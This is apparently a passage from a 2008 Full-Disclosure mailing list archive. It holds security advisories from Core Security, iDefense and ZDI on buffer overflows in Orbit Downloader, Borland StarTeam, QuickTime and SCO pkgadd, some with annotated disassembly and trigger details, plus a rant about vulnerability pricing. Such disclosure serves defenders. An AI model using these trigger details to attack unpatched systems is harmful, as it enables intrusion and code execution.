.text:004A5715    mov     ecx, [esp+2000h+uFormat]
.text:004A571C    mov     edx, [esp+2000h+lpRect]
.text:004A5723    push    ecx               ; uFormat
.text:004A5724    mov     ecx, [esp+2004h+hDC]
.text:004A572B    push    edx               ; lpRect
.text:004A572C    push    eax               ; nCount
.text:004A572D    lea     eax, [esp+200Ch+String]
.text:004A5731    push    eax               ; lpString
.text:004A5732    push    ecx               ; hDC
.text:004A5733    call    ds:DrawTextW
.text:004A5739    add     esp, 2000h
.text:004A573F    retn
.text:004A573F    endp                      ;sub_4A56D0

- -----------/

 According to MSDN [2], the Win32 API function

/-----------

int MultiByteToWideChar(
      UINT CodePage,
      DWORD dwFlags,
      LPCSTR lpMultiByteStr,
      int cbMultiByte,
      LPWSTR lpWideCharStr,
      int cchWideChar
);

- -----------/

has a parameter 'cchWideChar' which should be the "size, in WCHAR
values, of the buffer indicated by lpWideCharStr". By supplying a
download URL longer than 4096 bytes, if the download fails,
'MultiByteToWideChar' will overflow the 8192 bytes buffer in the stack
and write up to 0x2000 WCHARs (16384 bytes) to it, overwriting internal
structures and enabling arbitrary code execution.


*Report Timeline*

. 2008-03-19: Core Security Technologies notifies the Orbit team of the
vulnerability.
. 2008-03-27: The Orbit team asks Core Security Technologies for
technical description of the vulnerability.
. 2008-03-27: Technical details sent to Orbit team by Core Security
Technologies.
. 2008-04-03: Orbit notifies Core Security Technologies that a fix has
been produced.
. 2008-04-03: CORE-2008-0314 advisory is published.


*References*

[1] http://www.orbitdownloader.com
[2] http://msdn2.microsoft.com/en-us/library/ms776413(VS.85).aspx


*About CoreLabs*

CoreLabs, the research center of Core Security Technologies, is charged
with anticipating the future needs and requirements for information
security technologies. We conduct our research in several important
areas of computer security including system vulnerabilities, cyber
attack planning and simulation, source code auditing, and cryptography.
Our results include problem formalization, identification of
vulnerabilities, novel solutions and prototypes for new technologies.
CoreLabs regularly publishes security advisories, technical papers,
project information and shared software tools for public use at:
http://www.coresecurity.com/corelabs/.


*About Core Security Technologies*

Core Security Technologies develops strategic solutions that help
security-conscious organizations worldwide develop and maintain a
proactive process for securing their networks. The company's flagship
product, CORE IMPACT, is the most comprehensive product for performing
enterprise security assurance testing. CORE IMPACT evaluates network,
endpoint and end-user vulnerabilities and identifies what resources are
exposed. It enables organizations to determine if current security
investments are detecting and preventing attacks. Core Security
Technologies augments its leading technology solution with world-class
security consulting services, including penetration testing and software
security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core
Security Technologies can be reached at 617-399-6980 or on the Web at
http://www.coresecurity.com.


*Disclaimer*

The contents of this advisory are copyright (c) 2008 Core Security
Technologies and (c) 2008 CoreLabs, and may be distributed freely
provided that no fee is charged for this distribution and proper credit
is given.


*GPG/PGP Keys*

This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.7 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFH9UkByNibggitWa0RAuXFAJ4v5Fgp5RNTdK/7uOpzenSArY4jUQCeKV4D
4aeviH5oHhjdIRFmDLVVUx0=
=v9yp
-----END PGP SIGNATURE-----



From xploitable at gmail.com  Thu Apr  3 22:38:49 2008
From: xploitable at gmail.com (n3td3v)
Date: Thu, 3 Apr 2008 22:38:49 +0100
Subject: [Full-disclosure] Fwd: Let's outlaw mass
	securityconferencespamming its f****** gay
In-Reply-To: <004e01c89593$4cec60f0$336b880a@softpro.corp>
References: <4b6ee9310804012006t1c27a5cey3faf280ef0c43008@mail.gmail.com>
	<4b6ee9310804020940sfb838e2ncf96927f97c2a1f6@mail.gmail.com>
	<4b6ee9310804021533y1609769dke5a52d1078e5955e@mail.gmail.com>
	<27886.1207189079@turing-police.cc.vt.edu>
	<fec013240804021927h432e01bfyb6add150141cda87@mail.gmail.com>
	<030b01c89543$0b481540$6401a8c0@maryl>
	<C4B44D4D4D0053622A781365@Macintosh.local>
	<82abd3a70804030111q4896dc76h2c51434ad45c9885@mail.gmail.com>
	<6158bb410804030645w4057c055o503ff0302f87e1f8@mail.gmail.com>
	<004e01c89593$4cec60f0$336b880a@softpro.corp>
Message-ID: <4b6ee9310804031438vde21ff8od59b6c66325f5d05@mail.gmail.com>

On Thu, Apr 3, 2008 at 3:02 PM, Garrett M. Groff <groffg at gmgdesign.com> wrote:
> Regarding the particular person in question, I'll defer to others who know
> him (or her, or they, or whomever) better than I do. Instead, I'll say that,
> generally, on lists like FD, there is a minority of out-spoken personalities
> who sadly support the stereotypical hacker persona: condescending egoists
> who are socially inept and emotionally charged when discussing topics that
> relate to their knowledge domain. That's unfortunate, since the broader IT
> security community is poorly represented due to attention-seeking zealots.
>
> Regarding the idea of "oulawing security conference spamming," I'd say the
> literal idea of outlawing cross-posts to multiple security mailing lists is
> a bad idea. The idea that the legislature should write into law legislation
> that reduces our freedom in such a sense is a slippery slope borne of
> emotionalism and narrowness. What else should the government do to curtail
> our freedoms? I tend to side with libertarian types (though I don't call
> myself a "libertarian" un-qualified) on what the government should do and
> what they should not do. And micro-manage security mailing lists is
> something they should not do. It's a bad idea and would make a dreadful
> precedent.

Full-Disclosure is ment to be about free source, not making money. I'm
against people who make money come on the mailing lists, its
commerical spam. We can't allow this to continue, here are what I
don't like:

- Come to our conference - profit... buy our ticket, get a macbook prize.

- Hacking challenge prize - profit... they give you $5000 and sell it
to the vendor for a lot more.

- Train to use our software -profit... over priced training for
software... not interested.

On the issue of how much a vulnerability is worth, the prices are not
regulated, we need regulation into how much a vulnerability costs,
because the prices right now are wild. We need to take vulnerability
pricing off the blackmarket and onto a legitimate central website for
selling vulnerabilities, or cash rewards for disclosing a
vulnerability to a particular company or organisation. I don't like
sites like digital armaments which when i visited it, the content and
answers they gave were questionable, and people have complained about
digital armaments in the past. Its time to get pricing regulated and
defined, so everyone knows whos being joe jobbed and who isn't.

Can someone post to full-disclosure a price list of what they think a
bufferoverflow should be worth etc, and we can vote if we agree.

So what i'm calling for is someone to post up a hackers price list per
vulnerability type.

XSS/SQL should be worth something as well, so Morning_Wood can buy
milk and a news paper in the mornings after he's taken care of his
wood.

Sorry i've ended this e-mail with slightly off-topicness, but I do
think pricing needs to be defined.

We can't dress up cash prizes/contests as something else as well, if a
website is offering a $5,000 reward for a vulnerability, we need to
know if we're being ripped off with the cash reward and how much can
be potentially made after its sold on.

Robert Lemos even http://www.securityfocus.com/news/11510 talked about
vulnerability pricing when Pwn2Own was on, and even Pwn2Own cash
reward might not be enough money, compared to what a vulnerability
*should* be worth, and taking into consideration how much profit
CanSecWest make overall from people attending the conference.

So you take into consideration how much a vulnerability should be
worth, then the added worth because its a security conference of how
much should be added on to counter the profit being made by the event.

A vulnerability should be worth more if its disclosed at a security
conference than if its bought privately, because you've got to take in
profit  and free advertsing to calculate.

However, to round off, we can't allow the mailing lists to turn into a
vulnerability market place, full-disclosure should be for free stuff,
and other websites and mailing lists can be setup for *money making
schemes and auctions*.

We shouldn't allow the money makers directly to market X... if a link
is put on Full-Disclosure by a member of the public on the fly then
thats ok, but I think its cheeky for the particular conference,
contest runner or software trainer to be on the list themselves
spamming everyone, for a profiteering agenda.

You mention cross-posting, thats not the issue here, its the people
making the money posting to make the money that offends me so much.

And not even the lonely hacker offends me who posts i've got a
vulnerability for sale for X, I don't mind that on Full-Disclosure,
but what I do mind is if its a company or organisation doing it that
is directly the ones making the money via vulnerability for sale,
prize contest, security conference or train to use our software!!!,
thats the height of spam I just think is utterly wrong and unethical
on any scale of acceptability.

If a lonley hacker who works in a supermarket has a vulnerabilty to
sell i'm all for it being post on full-disclosure, but not the big
money conferences, prize hacking contests and software training guys.

I come under the bracket as supermarket worker with nothing much going
for me in life, so I should be allowed to sell a vulnerability on
what's ment to be a mailing list for non-profit disclosure.

If we tolerate the money making schemes much longer, eventually
full-disclosure will be a wash with conference,training,cash prize
spam, etc once everyone realises the full value of vulnerabilities and
the huge amounts of money to be made from setting up a cash prize
contest, the huge amounts of money to be made from setting up a
security conference and the huge amounts of money to be made from
training people to use your hax0r software.

You will find it easy to shout me down and say n3td3v's an idiot, but
wait to the vulnerability market really takes off and the prices of
vulnerabilities are properly defined and regulated, you're going to
see a huge increase in commercial spam on the mailing lists, like the
full-disclosure mailing list. so we've got to define what's fair play
e-mail and what's a company or organisation blatantly profiteering
with X method of extracting money out of people and using skilled
hackers to make money, and to promote a security conference, training
etc.

All the best,

n3td3v



From labs-no-reply at idefense.com  Thu Apr  3 22:43:27 2008
From: labs-no-reply at idefense.com (iDefense Labs)
Date: Thu, 03 Apr 2008 17:43:27 -0400
Subject: [Full-disclosure] iDefense Security Advisory 04.02.08: Borland
 CaliberRM StarTeam Multicast Service Buffer Overflow Vulnerability
Message-ID: <47F54F7F.3070500@idefense.com>

iDefense Security Advisory 04.02.08
http://labs.idefense.com/intelligence/vulnerabilities/
Apr 02, 2008

I. BACKGROUND

Borland CaliberRM is an enterprise software requirements management
system. It is part of Borland's distributed development and deployment
solution. For more information about Borland CaliberRM, please visit
following website.

http://www.borland.com/us/products/caliber/index.html

II. DESCRIPTION

Remote exploitation of a buffer overflow vulnerability in Borland
Software Corp.'s CaliberRM enterprise software requirements management
system could allow attackers to execute arbitrary code with SYSTEM
level privileges.

This vulnerability exists in the StarTeam Multicast Service component
(STMulticastService). This service is implemented using the HTTP
protocol. The vulnerable function, PGMWebHandler::parse_request, is
shown below.

  .text:003AA15D call PGMWebHandler::parse_request(char const 
*,uint,char *,uint,http_request_info_t &)
  ...
  .text:003AA35E loc_3AA35E:
  .text:003AA35E mov al, [ebx]
  .text:003AA360 cmp al, 0Ah
  .text:003AA362 mov [edx], al ; edx points to the stack, overflowable 
because of the loop
  .text:003AA364 jnz loc_3AA4EF
  ...
  .text:003AA36A mov byte ptr [edx+1], 0
  .text:003AA36E mov al, byte ptr [esp+618h+lbuff]
  .text:003AA372 cmp al, 0Dh
  .text:003AA374 jz loc_3AA509
  ...
  .text:003AA4F0 loc_3AA4F0:
  .text:003AA4F0 mov eax, [esp+618h+count]
  .text:003AA4F4 mov ecx, [esp+618h+req_len]
  .text:003AA4FB inc ebx
  .text:003AA4FC inc eax
  .text:003AA4FD cmp eax, ecx
  .text:003AA4FF mov [esp+618h+count], eax
  .text:003AA503 jl loc_3AA35E ; loop back up

While searching for the standard 0x0a0d that ends HTTP requests, a loop
copies attacker supplied data byte by byte into a fixed-size stack
buffer. If a large enough request is sent, the return address, SEH
pointers, and other stack data is overwritten.

III. ANALYSIS

Exploitation allows attackers to execute arbitrary code with SYSTEM
level privileges. In order to exploit this vulnerability an attacker
would have to send malicious data to the STMulticastService service
listening on TCP port 3057.

The StarTeam Multicast service is not installed by default with
CaliberRM 2006. The user must enable MPX Events and the StarTeam
Message Broker option during the installation process.

IV. DETECTION

iDefense confirmed that the trial version of Borland CaliberRM 2006
(file version 9.0.809.000) is vulnerable. The actual vulnerable
component is StarTeam Multicast Service 6.4. Other Borland products
containing StarTeam Multicast Service component, such as Borland
StarTeam, may also be affected.

V. WORKAROUND

In order to prevent exploitation of this vulnerability, administrators
can disable the Multicast Service monitoring port. For more information
consult Borland's Knowledge Base at the following URL.

http://support.borland.com/kbshow.php?q=29083

VI. VENDOR RESPONSE

Borland Software Corp. has not responded to repeated inquiries regarding
this vulnerability. iDefense Labs confirmed that the current version
(Borland CaliberRM 2008) still contains the vulnerable code. However,
the monitoring port appears to be disabled in a default installation.

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2008-0311 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org/), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

03/20/2007  Initial vendor notification
03/20/2007  Initial vendor response
08/06/2007  Second vendor notification
11/02/2007  Third vendor notification
04/02/2008  Public disclosure

IX. CREDIT

The discoverer of this vulnerability wishes to remain anonymous.

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright ? 2008 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please e-mail customerservice at idefense.com for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
 There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct,
indirect, or consequential loss or damage arising from use of, or
reliance on, this information.



From zdi-disclosures at 3com.com  Thu Apr  3 22:53:12 2008
From: zdi-disclosures at 3com.com (zdi-disclosures at 3com.com)
Date: Thu, 3 Apr 2008 16:53:12 -0500
Subject: [Full-disclosure] ZDI-08-017: Apple QuickTime Kodak Encoding Heap
	Overflow Vulnerability
Message-ID: <OFD4CB7C26.422D86AE-ON88257420.00774CBE-86257420.007839E1@3com.com>

ZDI-08-017: Apple QuickTime Kodak Encoding Heap Overflow Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-08-017
April 3, 2008

-- CVE ID:
CVE-2008-1020

-- Affected Vendors:
Apple

-- Affected Products:
Apple Quicktime 7.4.1

-- Vulnerability Details:
This vulnerability allows attackers to execute arbitrary code on
vulnerable installations of Apple QuickTime Player. User interaction is
required to exploit this vulnerability in that the target must visit a
malicious page or open a malicious file.

The specific flaw exists within the quicktime.qts library responsible
for parsing Kodak encoded images. A lack of proper error checking can
result in a heap based buffer overflow leading to arbitrary code
execution under the context of the currently logged in user.

-- Vendor Response:
Apple has issued an update to correct this vulnerability. More
details can be found at:

http://support.apple.com/kb/HT1241

-- Disclosure Timeline:
2008-02-07 - Vulnerability reported to vendor
2008-04-03 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
    * Ruben Santamarta of Reversemode.com

-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents 
a best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:

    http://www.zerodayinitiative.com

The ZDI is unique in how the acquired vulnerability information is
used. TippingPoint does not re-sell the vulnerability details or any
exploit code. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.

Our vulnerability disclosure policy is available online at:

    http://www.zerodayinitiative.com/advisories/disclosure_policy/

CONFIDENTIALITY NOTICE: This e-mail message, including any attachments,
is being sent by 3Com for the sole use of the intended recipient(s) and
may contain confidential, proprietary and/or privileged information.
Any unauthorized review, use, disclosure and/or distribution by any 
recipient is prohibited.  If you are not the intended recipient, please
delete and/or destroy all copies of this message regardless of form and
any included attachments and notify 3Com immediately by contacting the
sender via reply e-mail or forwarding to 3Com at postmaster at 3com.com. 

From zdi-disclosures at 3com.com  Thu Apr  3 22:55:25 2008
From: zdi-disclosures at 3com.com (zdi-disclosures at 3com.com)
Date: Thu, 3 Apr 2008 16:55:25 -0500
Subject: [Full-disclosure] ZDI-08-019: Apple QuickTime Malformed VR obji
 Atom Parsing Memory Corruption Vulnerability
Message-ID: <OF20940E04.5F875A74-ON88257420.00774E09-86257420.00786DEA@3com.com>

ZDI-08-019: Apple QuickTime Malformed VR obji Atom Parsing Memory 
Corruption Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-08-019
April 3, 2008

-- CVE ID:
CVE-2008-1022

-- Affected Vendors:
Apple

-- Affected Products:
Apple Quicktime 7.4.1

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability by Digital Vaccine protection filter ID 5954. 
For further product information on the TippingPoint IPS, visit:

    http://www.tippingpoint.com

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of Apple QuickTime. User interaction is
required to exploit this vulnerability in that the target must open a
malicious file.

The specific flaw exists in the parsing of the QuickTime VR 'obji' atom.
When the size of the atom is set to 0, a stack overflow condition occurs
resulting in the execution of arbitrary code.

-- Vendor Response:
Apple has issued an update to correct this vulnerability. More
details can be found at:

http://support.apple.com/kb/HT1241

-- Disclosure Timeline:
2008-02-07 - Vulnerability reported to vendor
2008-04-03 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
    * Anonymous

-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents 
a best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:

    http://www.zerodayinitiative.com

The ZDI is unique in how the acquired vulnerability information is
used. TippingPoint does not re-sell the vulnerability details or any
exploit code. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.

Our vulnerability disclosure policy is available online at:

    http://www.zerodayinitiative.com/advisories/disclosure_policy/

CONFIDENTIALITY NOTICE: This e-mail message, including any attachments,
is being sent by 3Com for the sole use of the intended recipient(s) and
may contain confidential, proprietary and/or privileged information.
Any unauthorized review, use, disclosure and/or distribution by any 
recipient is prohibited.  If you are not the intended recipient, please
delete and/or destroy all copies of this message regardless of form and
any included attachments and notify 3Com immediately by contacting the
sender via reply e-mail or forwarding to 3Com at postmaster at 3com.com. 

From zdi-disclosures at 3com.com  Thu Apr  3 22:50:24 2008
From: zdi-disclosures at 3com.com (zdi-disclosures at 3com.com)
Date: Thu, 3 Apr 2008 16:50:24 -0500
Subject: [Full-disclosure] ZDI-08-015: Apple QuickTime Clipping Region Heap
	Overflow Vulnerability
Message-ID: <OF7C6428A6.52FBC175-ON88257420.00774B5F-86257420.0077F87C@3com.com>

ZDI-08-015: Apple QuickTime Clipping Region Heap Overflow Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-08-015
April 3, 2008

-- CVE ID:
CVE-2008-1017

-- Affected Vendors:
Apple

-- Affected Products:
Apple Quicktime 7.4.1

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability by Digital Vaccine protection filter ID 5931. 
For further product information on the TippingPoint IPS, visit:

    http://www.tippingpoint.com

-- Vulnerability Details:
This vulnerability allows attackers to execute arbitrary code on
vulnerable installations of Apple QuickTime Player. User interaction is
required to exploit this vulnerability in that the target must visit a
malicious page or open a malicious file.

The specific flaw exists within the quicktime.qts library. The
vulnerability resides in the component's parsing of 'crgn' atoms. A lack
of proper sanity checks on the region size field can result in a heap
based buffer overflow leading to arbitrary code execution under the
context of the currently logged in user.

-- Vendor Response:
Apple has issued an update to correct this vulnerability. More
details can be found at:

http://support.apple.com/kb/HT1241

-- Disclosure Timeline:
2008-02-07 - Vulnerability reported to vendor
2008-04-03 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
    * Sanbin Li

-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents 
a best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:

    http://www.zerodayinitiative.com

The ZDI is unique in how the acquired vulnerability information is
used. TippingPoint does not re-sell the vulnerability details or any
exploit code. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.

Our vulnerability disclosure policy is available online at:

    http://www.zerodayinitiative.com/advisories/disclosure_policy/

CONFIDENTIALITY NOTICE: This e-mail message, including any attachments,
is being sent by 3Com for the sole use of the intended recipient(s) and
may contain confidential, proprietary and/or privileged information.
Any unauthorized review, use, disclosure and/or distribution by any 
recipient is prohibited.  If you are not the intended recipient, please
delete and/or destroy all copies of this message regardless of form and
any included attachments and notify 3Com immediately by contacting the
sender via reply e-mail or forwarding to 3Com at postmaster at 3com.com. 

From zdi-disclosures at 3com.com  Thu Apr  3 22:51:23 2008
From: zdi-disclosures at 3com.com (zdi-disclosures at 3com.com)
Date: Thu, 3 Apr 2008 16:51:23 -0500
Subject: [Full-disclosure] ZDI-08-016: Apple QuickTime MP4A Atom Parsing
	Heap Corruption Vulnerability
Message-ID: <OF88F6D514.C502D443-ON88257420.00774C1E-86257420.00780F77@3com.com>

ZDI-08-016: Apple QuickTime MP4A Atom Parsing Heap Corruption 
Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-08-016
April 3, 2008

-- CVE ID:
CVE-2008-1018

-- Affected Vendors:
Apple

-- Affected Products:
Apple Quicktime 7.4.1

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability by Digital Vaccine protection filter ID 3377. 
For further product information on the TippingPoint IPS, visit:

    http://www.tippingpoint.com

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of Apple QuickTime. User interaction is
required to exploit this vulnerability in that the target must visit a
malicious page.

The specific flaw exists in the parsing of the QuickTime Channel
Compositor atom. When the movie file contains a malformed 'chan' atom, a
heap corruption occurs resulting in the execution of arbitrary code.

-- Vendor Response:
Apple has issued an update to correct this vulnerability. More
details can be found at:

http://support.apple.com/kb/HT1241

-- Disclosure Timeline:
2008-02-07 - Vulnerability reported to vendor
2008-04-03 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
    * Anonymous

-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents 
a best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:

    http://www.zerodayinitiative.com

The ZDI is unique in how the acquired vulnerability information is
used. TippingPoint does not re-sell the vulnerability details or any
exploit code. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.

Our vulnerability disclosure policy is available online at:

    http://www.zerodayinitiative.com/advisories/disclosure_policy/

CONFIDENTIALITY NOTICE: This e-mail message, including any attachments,
is being sent by 3Com for the sole use of the intended recipient(s) and
may contain confidential, proprietary and/or privileged information.
Any unauthorized review, use, disclosure and/or distribution by any 
recipient is prohibited.  If you are not the intended recipient, please
delete and/or destroy all copies of this message regardless of form and
any included attachments and notify 3Com immediately by contacting the
sender via reply e-mail or forwarding to 3Com at postmaster at 3com.com. 

From zdi-disclosures at 3com.com  Thu Apr  3 22:49:25 2008
From: zdi-disclosures at 3com.com (zdi-disclosures at 3com.com)
Date: Thu, 3 Apr 2008 16:49:25 -0500
Subject: [Full-disclosure] ZDI-08-014: Apple Quicktime Multiple Opcode
 Memory Corruption Vulnerabilities
Message-ID: <OF6947A201.B30DCD86-ON88257420.00774A46-86257420.0077E16F@3com.com>

ZDI-08-014: Apple Quicktime Multiple Opcode Memory Corruption 
Vulnerabilities
http://www.zerodayinitiative.com/advisories/ZDI-08-014
April 3, 2008

-- CVE ID:
CVE-2008-1019

-- Affected Vendors:
Apple

-- Affected Products:
Apple Quicktime 7.4.1

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of Apple QuickTime. User interaction is
required to exploit this vulnerability in that the target must open a
malicious file.

The specific flaw exists in the quickTime.qts while parsing corrupted
.pict files. The module contains a vulnerable memory copy loop which
searches for a terminator value. When this value is changed or omitted,
a heap corruption occurs allowing the execution of arbitrary code.

-- Vendor Response:
Apple has issued an update to correct this vulnerability. More
details can be found at:

http://support.apple.com/kb/HT1241

-- Disclosure Timeline:
2008-02-07 - Vulnerability reported to vendor
2008-04-03 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
    * bugfree

-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents 
a best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:

    http://www.zerodayinitiative.com

The ZDI is unique in how the acquired vulnerability information is
used. TippingPoint does not re-sell the vulnerability details or any
exploit code. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.

Our vulnerability disclosure policy is available online at:

    http://www.zerodayinitiative.com/advisories/disclosure_policy/

CONFIDENTIALITY NOTICE: This e-mail message, including any attachments,
is being sent by 3Com for the sole use of the intended recipient(s) and
may contain confidential, proprietary and/or privileged information.
Any unauthorized review, use, disclosure and/or distribution by any 
recipient is prohibited.  If you are not the intended recipient, please
delete and/or destroy all copies of this message regardless of form and
any included attachments and notify 3Com immediately by contacting the
sender via reply e-mail or forwarding to 3Com at postmaster at 3com.com. 

From zdi-disclosures at 3com.com  Thu Apr  3 22:54:32 2008
From: zdi-disclosures at 3com.com (zdi-disclosures at 3com.com)
Date: Thu, 3 Apr 2008 16:54:32 -0500
Subject: [Full-disclosure] ZDI-08-018: Apple QuickTime Run Length Encoding
	Heap Overflow Vulnerability
Message-ID: <OFCBB3C2B1.C08F0061-ON88257420.00774D58-86257420.00785915@3com.com>

ZDI-08-018: Apple QuickTime Run Length Encoding Heap Overflow 
Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-08-018
April 3, 2008

-- CVE ID:
CVE-2008-1021

-- Affected Vendors:
Apple

-- Affected Products:
Apple Quicktime 7.4.1

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability by Digital Vaccine protection filter ID 5998. 
For further product information on the TippingPoint IPS, visit:

    http://www.tippingpoint.com

-- Vulnerability Details:
This vulnerability allows attackers to execute arbitrary code on
vulnerable installations of Apple QuickTime Player. User interaction is
required to exploit this vulnerability in that the target must visit a
malicious page or open a malicious file.

The specific flaw exists within the parsing of QuickTime files that
utilize the Animation codec. A lack of proper length checks can result
in a heap based buffer overflow leading to arbitrary code execution
under the context of the currently logged in user.

-- Vendor Response:
Apple has issued an update to correct this vulnerability. More
details can be found at:

http://support.apple.com/kb/HT1241

-- Disclosure Timeline:
2008-02-07 - Vulnerability reported to vendor
2008-04-03 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
    * Anonymous

-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents 
a best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:

    http://www.zerodayinitiative.com

The ZDI is unique in how the acquired vulnerability information is
used. TippingPoint does not re-sell the vulnerability details or any
exploit code. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.

Our vulnerability disclosure policy is available online at:

    http://www.zerodayinitiative.com/advisories/disclosure_policy/

CONFIDENTIALITY NOTICE: This e-mail message, including any attachments,
is being sent by 3Com for the sole use of the intended recipient(s) and
may contain confidential, proprietary and/or privileged information.
Any unauthorized review, use, disclosure and/or distribution by any 
recipient is prohibited.  If you are not the intended recipient, please
delete and/or destroy all copies of this message regardless of form and
any included attachments and notify 3Com immediately by contacting the
sender via reply e-mail or forwarding to 3Com at postmaster at 3com.com. 

From labs-no-reply at idefense.com  Thu Apr  3 23:47:32 2008
From: labs-no-reply at idefense.com (iDefense Labs)
Date: Thu, 03 Apr 2008 18:47:32 -0400
Subject: [Full-disclosure] iDefense Security Advisory 04.03.08: SCO UnixWare
 pkgadd Directory Traversal Vulnerability
Message-ID: <47F55E84.3000903@idefense.com>

iDefense Security Advisory 04.03.08
http://labs.idefense.com/intelligence/vulnerabilities/
Apr 03, 2008

I. BACKGROUND

SCO UnixWare is a UNIX operating system that runs on many OEM platforms.
The pkgadd command is used to install packages on the system. More
information about the product is available from the URL shown below.

http://www.sco.com/products/unixware714/

II. DESCRIPTION

Local exploitation of a directory traversal vulnerability within the
pkgadd program distributed with SCO Group Inc's UnixWare operating
system allows attackers to gain root privileges.

By setting an environment variable to a value containing directory
traversal sequences, such as "../", an attacker can cause the program
to create or append to arbitrary files on the system.

III. ANALYSIS

Exploitation allows attackers gain root privileges. Access to execute
arbitrary shell commands is required to exploit this issue.

By targeting specific system files, an attacker can add accounts or
otherwise facilitate privilege escalation.

IV. DETECTION

iDefense confirmed the existence of this vulnerability within version
7.1.4 of UnixWare with all patches available as of August 27th, 2007
installed. Previous versions are suspected to be vulnerable.

V. WORKAROUND

Changing the permissions of the pkgadd command to only allow root to
execute this program will prevent exploitation of this vulnerability.

  # chmod 700 /usr/sbin/pkgadd

VI. VENDOR RESPONSE

SCO has addressed this vulnerability by releasing patches. For more
information, consult their advisory at the following URL.

